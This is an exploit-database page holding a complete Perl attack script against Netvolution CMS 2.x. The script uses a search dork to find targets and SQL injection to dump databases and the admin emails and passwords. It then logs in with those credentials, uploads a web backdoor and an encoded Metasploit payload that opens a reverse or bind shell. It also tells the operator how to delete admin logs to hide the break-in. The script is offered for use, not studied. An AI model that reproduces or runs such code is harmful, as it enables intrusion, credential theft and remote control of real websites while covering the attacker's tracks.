0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Netvolution CMS <= 2.x SQL Injection Exploit Script
=================================================== Netvolution CMS <= 2.x SQL Injection Exploit Script =================================================== #!/usr/bin/perl ######################################################################################### # # # Exploit Title: Netvolution exploit script for CMS Version >= 2.xx.xx.xx # # Date: 10/6/2010 # # Sotware Link: www.netvolution.net # # Exploited by: krumel # # Exploit Coded: mr.pr0n # # # # Many thanks to icesurfer (author of SQLNINJA) and all p0wnbox members. # # I have contact www.atcom.gr no response yet, although it seems that they have patch # # partially the software. # ######################################################################################### # # # This program is free software; you can redistribute it and/or # # modify it under the terms of the GNU General Public License # # as published by the Free Software Foundation; either version 2 # # of the License, or (at your option) any later version. # # # # This program is distributed in the hope that it will be useful, # # but WITHOUT ANY WARRANTY; without even the implied warranty of # # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # # GNU General Public License for more details. # # # # You should have received a copy of the GNU General Public License # # along with this program; if not, write to the Free Software # # Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. # # # ######################################################################################### #Using some modules! use LWP::UserAgent; use IO::Socket; use IO::Handle; print "\e[1;31m _ _ _ _ _ _ _ _ _ \e[0m\n"; print "\e[1;31m | \\ | | | | | | | | (_) | | (_) | \e[0m\n"; print "\e[1;31m | \\| | ___| |___ _____ | |_ _| |_ _ ___ _ __ _____ ___ __ | | ___ _| |_ \e[0m\n"; print "\e[1;31m | . ` |/ _ \\ __\\ \\ / / _ \\| | | | | __| |/ _ \\| '_ \\ / _ \\ \\/ / '_ \\| |/ _ \\| | __| \e[0m\n"; print "\e[1;31m | |\\ | __/ |_ \\ V / (_) | | |_| | |_| | (_) | | | | | __/> <| |_) | | (_) | | |_ \e[0m\n"; print "\e[1;31m |_| \\_|\\___|\\__| \\_/ \\___/|_|\\__,_|\\__|_|\\___/|_| |_| \\___/_/\\_\\ .__/|_|\\___/|_|\\__| \e[0m\n"; print "\e[1;31m | | \e[0m\n"; print "\e[1;31m |_| ...for CMS Version >= 2.xx.xx.xx \e[0m\n"; # ************* # # Target dork. # ************* # print "\nGoogle Dork:"; print "\n\e[1;45mallinurl: 'default.asp?pid'\e[0m\n"; # ************ # # Main Menu. # ************ # menu:; print "\n[*] Main Menu:\n"; print " 1. Automated list site scan for injection.\n"; print " 2. Export all Infomation_Schema Tables and Columns.\n"; print " 3. Find all Databases.\n"; print " 4. Export all usernames and passwords of the 'cms_Users' table.\n"; print " 5. Manuall exploitation.\n"; print " 6. Compatibility with the Metasploit Framework.\n"; print " 7. Exit.\n"; print "> "; $option=<STDIN>; print "\n"; if ($option!=1 && $option!=2 && $option!=3 && $option!=4 && $option!=5 && $option!=6 && $option!=7) { print "\e[1;31mWrong Option!!\e[0m\n"; goto menu; } # Select Option. if ($option==1) {&site_scan} # Automated list site scan for injection. if ($option==2) {&info_schema_tables_and_columns}# Export all Infomation_Schema Tables and Columns. if ($option==3) {&extract_db}# Find all Databases. if ($option==4) {&automated_exploitation}# Export all usernames and passwords of the 'cms_Users'table. if ($option==5) {&manually}# Manuall exploitation. if ($option==6) {&metasploit}# Compatibility with Metasploit Project (Under construction). if ($option==7) {&quit}# Quit it! # ******************************************* # # Automated list site scan for injection. # ******************************************* # sub site_scan { $sites= "/Users/pentest/Desktop/sites.txt"; ######## ***[E_D_I_T H_E_R_E]*** ############## $scan = "10+and+1=convert(int,db_name(1))"; # Counter $i = 1; print " [*]Opening site list... \n"; open (SITELIST, $sites); print " [*]Sitelist opened successfully!\n"; print " [*]Scanning...\n"; @sitelist = <SITELIST>; print " [*]Results:\n"; for ($i; $i <= @sitelist; $i++) { $host = $sitelist[$i]; chop ($host); $int = LWP::UserAgent->new() or die; $check=$int->get($host.$scan); if ($check->content =~ m/value '(.*)' to/g) { print "\e[1;36m$host\e[0m\n"; } } goto menu; } # ********************************************************** # # Exploiting *all* the Infomation_Schema Tables and Columns. # ********************************************************** # sub info_schema_tables_and_columns { # ***************# # Table Counter # ***************# print "Enter your Target (e.g.: http://www.target.gr/default.asp?pid=73&artID=)\n"; print "> "; $atcom=<STDIN>; print "Enter the range scanning of Tables (e.g.: 15): \n"; print "> "; $endt =<STDIN>; # Counter $countt = 1; print "\n [*] Exloiting Information_Schema Tables...\n"; $infoschema_t = "10+and+1=convert(int,(se%l%e%c%t%20top%20%201%20table_name%20from%20Information_Schema.tables))"; $int = LWP::UserAgent->new() or die; $check=$int->get($atcom.$infoschema_t); if ($check->content =~ m/value '(.*)' to/g) { ($first_t) = $1; print "\e[1;33m$first_t\e[0m\n"; @chars_t = split(//, "$first_t"); $got_t = join("%", @chars_t); $first_t = "%27$got_t%27"; for ($countt; $countt <= $endt; $countt++) { $fullsqli_t = "10+and+1=convert(int,(se%l%e%c%t%20top%20%201%20table_name%20from%20Information_Schema.tables%20where%20table_name%20not%20in($first_t)))"; $int = LWP::UserAgent->new() or die; $check=$int->get($atcom.$fullsqli_t); if ($check->content =~ m/value '(.*)' to/g) { ($next_t) = $1; print "\e[1;33m$next_t\e[0m\n"; @chars_t = split(//, "$next_t"); $got_t = join("%", @chars_t); $next_t = $got_t ; $first_t = $first_t.",%27".$next_t."%27"; } } } else { print "\e[1;31mFAILED!\e[0m\n"; } # ***************# # Column Counter # ***************# print "Enter the range of scanning Columns (e.g.: 20)\n"; print "> "; $endc =<STDIN>; # Counter $countc = 1; print "[*] Exloiting Information_Schema Column...\n"; $infoschema_c = "10+and+1=convert(int,(se%l%e%c%t%20top%20%201%20column_name%20from%20Information_Schema.columns))"; $int = LWP::UserAgent->new() or die; $check=$int->get($atcom.$infoschema_c); if ($check->content =~ m/value '(.*)' to/g) { ($first_c) = $1; print "\e[1;33m$first_c\e[0m\n"; @chars_c = split(//, "$first_c"); $got_c = join("%", @chars_c); $first_c = "%27$got_c%27"; for ($countc; $countc <= $endc; $countc++) { $fullsqli_c = "10+and+1=convert(int,(se%l%e%c%t%20top%20%201%20column_name%20from%20Information_Schema.columns%20where%20column_name%20not%20in($first_c)))"; $int = LWP::UserAgent->new() or die; $check=$int->get($atcom.$fullsqli_c); if ($check->content =~ m/value '(.*)' to/g) { ($next_c) = $1; print "\e[1;33m$next_c\e[0m\n"; @chars_c = split(//, "$next_c"); $got_c = join("%", @chars_c); $next_c = $got_c ; $first_c = $first_c.",%27".$next_c."%27"; } } } else { print "\e[1;31mFAILED!\e[0m"; } goto menu; } # *************************************** # # Exploiting *all* the inside Databases. # *************************************** # sub extract_db { print "Enter your Target (e.g.: http://www.target.gr/default.asp?pid=73&artID=)\n"; print "> "; $atcom=<STDIN>; print "Enter the range of scanning Databases (e.g.: 30)\n"; print "> "; $enddb =<STDIN>; # Counter $countdb = 1; print "[*] Exloiting the inside Databases....\n"; for ($countdb; $countdb <= $enddb; $countdb++) { $db = "10+and+1=convert(int,db_name($countdb))"; $int = LWP::UserAgent->new() or die; $check=$int->get($atcom.$db); if ($check->content =~ m/value '(.*)' to/g) { ($database) = $1; print "[ID:$countdb]","\e[1;35m$database\e[0m\n"; } else { print "\e[1;31mFAILED!\e[0m\n"; } } goto menu; } # ***************************************************************** # # Exploiting *all* usernames and passwords of the table "cms_Users" # ***************************************************************** # sub automated_exploitation { print "Enter your Target (e.g.: http://www.target.gr/default.asp?pid=73&artID=)\n"; print "> "; $atcom=<STDIN>; print "Enter the range of scanning userID (e.g.: 20)\n"; print "> "; $end =<STDIN>; # Counter $count = 1; print "[*] Exloiting Usernames and Passwords...\n"; for ($count; $count <= $end; $count++) { $useremail = "10+and+1=convert(int,(se%l%e%c%t(substring(useremail,1,1000))%20from%20cms_Users%20where%20userID=$count%29%29"; $userpassword = "10+and+1=convert(int,(se%l%e%c%t%20(substring(userpassword,1,10000))%20from%20cms_Users%20where%20userID=$count%29%29"; $int = LWP::UserAgent->new() or die; $check=$int->get($atcom.$useremail); if ($check->content =~ m/value '(.*)' to/g) { ($email) = $1; print "[ID:$count]"," \e[1;32m$email\e[0m"; $gotmail = $email; # Usage for the section of Metasploit Framework. $int = LWP::UserAgent->new() or die; $check=$int->get($atcom.$userpassword); if ($check->content =~ m/value '(.*)' to/g){ ($pass) = $1; print " : \e[1;32m$pass\e[0m\n"; $gotpass = $pass; # Usage for the section of Metasploit Framework. } else { print " : \e[1;31m-\e[0m\n"; }} else { print "[ID:$count","] \e[1;31m-\e[0m : \e[1;31m-\e[0m\n"; } } goto menu; } # **************************************** # # Exploiting Columns and Tables manually. # **************************************** # sub manually { print "Enter your Target (e.g.: http://www.target.gr/default.asp?pid=73&artID=)\n"; print "> "; $atcom=<STDIN>; print "Enter the name of your target's Table (e.g.: cms_Users)\n"; print "> "; $table =<STDIN>; print "Enter your the name of your target's Column (e.g.: userpassword)\n"; print "> "; $column =<STDIN>; print "Enter the range of scanning (e.g.: 10)\n"; print "> "; $endm =<STDIN>; $countm = 1; print "[*] Manuall Exploitation...\n"; for ($countm; $countm <= $endm; $countm++) { $manually = "10+and+1=convert(int,(se%l%e%c%t(substring($column,1,1000))%20from%20$table%20where%20userID=$countm%29%29"; $int = LWP::UserAgent->new() or die; $check=$int->get($atcom.$manually); if ($check->content =~ m/value '(.*)' to/g){ ($got) = $1; print "[ID:$countm]"," \e[1;32m$got\e[0m\n"; } else { print "[ID:$countm","] \e[1;31m-\e[0m : \e[1;31m-\e[0m\n"; } } goto menu; } # ***************************************************************** # # Compatibility with the Metasploit Framework. # ***************************************************************** # sub metasploit { if (($gotmail eq "") or ($gotpass eq "")) { print "Enter your Target (e.g.: http://www.target.gr/default.asp?pid=73&artID=)\n"; print "> "; $atcom=<STDIN>; $end = 10; $count = 1; for ($count; $count < $end; $count++) { $useremail = "10+and+1=convert(int,(se%l%e%c%t(substring(useremail,1,1000))%20from%20cms_Users%20where%20userID=$count%29%29"; $userpassword = "10+and+1=convert(int,(se%l%e%c%t%20(substring(userpassword,1,10000))%20from%20cms_Users%20where%20userID=$count%29%29"; $int = LWP::UserAgent->new() or die; $check=$int->get($atcom.$useremail); if ($check->content =~ m/value '(.*)' to/g) { ($email) = $1; $gotmail = $email; $int = LWP::UserAgent->new() or die; $check=$int->get($atcom.$userpassword); if ($check->content =~ m/value '(.*)' to/g){ ($pass) = $1; $gotpass = $pass; $end = $count; }} } } if ($atcom =~ m/www.(.*).gr/g){ ($site) = $1; } # Checking if the Metasploit Framework is already installed. print "[*] Looking for the Metasploit Framework... "; $msfcli = ""; $msfpayload = ""; if ($msfpath eq "") { $path1 = $ENV{PATH}; @path = split(/:/,$path1); foreach (@path) { if (-e $_."/msfcli") { $msfcli = $_."/msfcli"; } elsif (-e $_."/msfcli3") { $msfcli = $_."/msfcli3"; } if (-e $_."/msfpayload") { $msfpayload = $_."/msfpayload"; } elsif (-e $_."/msfpayload3") { $msfpayload = $_."/msfpayload3"; } } } else { if (-e $msfpath."/msfcli") { $msfcli = $msfpath."msfcli"; } elsif (-e $msfpath."/msfcli3") { $msfcli = $msfpath."msfcli3"; } if (-e $msfpath."/msfpayload") { $msfpayload = $msfpath."msfpayload"; } elsif (-e $msfpath."/msfpayload3") { $msfpayload = $msfpath."msfpayload3"; } } if ($msfcli eq ""){ print "[\e[1;31m FAILED \e[0m]\n"; print "[-] msfcli not found\n"; exit(-1); } if ($msfpayload eq "") { print "[\e[1;32m FAILED \e[0m]\n"; print "[-] msfpayload not found\n"; exit(-1); } print "[\e[1;32m DONE \e[0m]\n"; #Retrieve Cookie system('curl -k -L -b cookies.txt -c cookies.txt -o step-1.html http://www.'.$site.'.gr/'); system('curl -k -L -b cookies.txt -c cookies.txt -d email='.$gotmail.' -d password='.$gotpass.' -o step-2.html http://www.'.$site.'.gr/admin/default.asp?ac=2'); #Upload Web-Backdoor system('curl -k -L -b cookies.txt -c cookies.txt -F name=file1 -F filename=@cmdasp.aspx http://www.'.$site.'.gr/admin/tools/files/filesUpload.asp?folder=..%2F..%2F..%2Ffiles'); # Choose your payload. print "Which payload you want to use?\n"; print " 1. Meterpreter\n 2. VNC\n"; while (($payload ne 1) and ($payload ne 2)) { print "msf > "; $payload = <STDIN>; chomp($payload); } if ($payload == 1) { $payload = "meterpreter"; } else { $payload = "vncinject"; } # Choose your connection. print "Which type of connection you want to use?\n"; print " 1. bind_tcp\n 2. reverse_tcp\n"; while (($conn ne "1") and ($conn ne "2")) { print "msf > "; $conn = <STDIN>; chomp($conn); } if ($conn == 1) { $conn = "bind_tcp"; } else { $conn = "reverse_tcp"; } if ($conn eq "bind_tcp"){ print "Enter your Remote host\n"; print "msf > "; $rhost = <STDIN>; chomp $rhost } else { print "Enter your Public IP\n"; print "msf > "; $lhost = <STDIN>; chomp $lhost ; print "Enter your Local Host\n"; print "msf > "; $lhost1 = <STDIN>; chomp $lhost1 ; } if ($conn eq "bind_tcp"){ print "Enter Remote port number\n"; } else { print "Enter local port number\n"; } $port = 0; while (($port < 1) or ($port > 65535)){ print "msf > "; $port = <STDIN>; chomp($port); } # Choose your Encryption. $enc = -1; print "[*] Choose a payload encoding method:\n". " 0. None\n". " 1. Alpha2 Alphanumeric Mixedcase\n". " 2. Alpha2 Alphanumeric Uppercase\n". " 3. Avoid UTF8/tolower\n". " 4. Call+4 Dword XOR\n". " 5. Single-byte XOR Countdown\n". " 6. Variable-length Fnstenv/mov Dword XOR\n". " 7. Polymorphic Jump/Call XOR Additive Feedback\n". " 8. Non-Alpha\n". " 9. Non-Upper\n". " 10. Polymorphic XOR Additive Feedback\n". " 11. Alpha2 Alphanumeric Unicode Mixedcase\n". " 12. Alpha2 Alphanumeric Unicode Uppercase\n"; while (($enc < 0) or ($enc > 12)) { print "msf > "; $enc = <STDIN>; chomp($enc); } $encoder = " encoder="; for ($enc) { /^0$/ && do {$encoder = ""}; /^1$/ && do {$encoder .= "x86/alpha_mixed "}; /^2$/ && do {$encoder .= "x86/alpha_upper "}; /^3$/ && do {$encoder .= "x86/avoid_utf8_tolower "}; /^4$/ && do {$encoder .= "x86/call4_dword_xor "}; /^5$/ && do {$encoder .= "x86/countdown "}; /^6$/ && do {$encoder .= "x86/fnstenv_mov "}; /^7$/ && do {$encoder .= "x86/jmp_call_additive "}; /^8$/ && do {$encoder .= "x86/nonalpha "}; /^9$/ && do {$encoder .= "x86/nonupper "}; /^10$/ && do {$encoder .= "x86/shikata_ga_nai "}; /^11$/ && do {$encoder .= "x86/unicode_mixed "}; /^12$/ && do {$encoder .= "x86/unicode_upper "}; } # Creation of the executable payload. $exe = "backup".int(rand()*010101); $command = $msfpayload." windows/".$payload."/".$conn.$encoder." exitfunc=process"; if ($conn eq "bind_tcp") { $command .= " lport=".$port." X > /tmp/".$exe.".exe"; } else { $command .= " lport=".$port." lhost=".$lhost." X "."> /tmp/".$exe.".exe"; } if ($verbose == 1) { print "[v] Command: ".$command."\n"; } system ($command); unless (-e "/tmp/".$exe.".exe") { print "[-] Payload creation... [\e[1;31m FAILED \e[0m]\n"; exit(-1); } print "[*] Payload creation... [\e[1;32m DONE \e[0m]\n"; print "[*] Payload (".$exe.".exe) created.\n"; $xpl = '/tmp/'.$exe.'.exe'; #Upload the executable file to the remote Webserver. system('curl -k -L -b cookies.txt -c cookies.txt -F name=file1 -F filename=@'.$xpl.' http://www.'.$site.'.gr/admin/tools/files/filesUpload.asp?folder=..%2F..%2F..%2Ffiles'); $parameter = $exe.".exe"; # The child handles the request to the target, the parent calls Metasploit Framework! $pid = fork(); if ($pid eq 0) { sleep(1); exit(0); } # This is the parent. $syscommand = $msfcli." exploit/multi/handler "."PAYLOAD=windows/".$payload."/".$conn." "; if ($conn eq "bind_tcp") { $syscommand .= "LPORT=".$port." RHOST=".$rhost." E"; print "\e[1;34m$syscommand\e[0m\n"; } else { $syscommand .= "LPORT=".$port." LHOST=".$lhost1." E"; print "\e[1;34m$syscommand\e[0m\n"; } #Execute msfcli print "Are you ready to execute msfcli? (Press Enter)\n"; print "msf > "; $enter = <STDIN>; chomp($enter); print " Please Wait..."; print "[*] Executing the msfcli... [\e[1;32m DONE \e[0m]\n"; system("xterm -bg black -fg white -bd black -e ".$syscommand." &"); # If you don't have xterm, install IT! sleep(30); # Sleep 30 seconds to fire up Metasploit Framework! #Execute metasploit shell throught Web-Backdoor (cmdasp.aspx). system('curl -k -L -b /tmp/cookies.txt -c /tmp/cookies.txt -d __VIEWSTATE=%2FwEPDwULLTE2MjA0MDg4ODhkZKAYI%2BuShUtjaEQHez7lnHYtwecj -d txtArg="C:\Inetpub\EventSites\enterpriseitsecurity.gr\files\\'.$parameter.'" -d testing=excute -d __EVENTVALIDATION=%2FwEWAwLw6bCOCgKa%2B%2BKPCgKBwth5tWrCE%2BPx6jReXWdJAVRgAZWRoxo%3D http://www.'.$site.'.gr/files/cmdasp.aspx'); } print "# ******************************************************************************#\n"; print "# CAUTION CAUTION CAUTION CAUTION CAUTION *#\n"; print "# ******************************************************************************#\n"; print "# In Order to delete the logs go to http://www.target.gr/files/cmdasp.aspx *#\n"; print "# and execute the following command : *#\n"; print "# *#\n"; print "# sqlcmd -S target_IP -U Database_User -P Database_Password -d Target_Database *#\n"; print "# -Q ''delete from cms_AdminLog where logRecDbTable='Your_Public_IP' '' -u *#\n"; print "# *#\n"; print "# The Username and password for the Database can be found inside global.asa *#\n"; print "# ******************************************************************************#\n"; # ***********# # Quitting :D # ***********# sub quit { print "\e[1;31mExiting...Bye-Bye!\e[0m\n"; exit(1); } # ***************************************************************** # # 0day.today [2024-12-26] #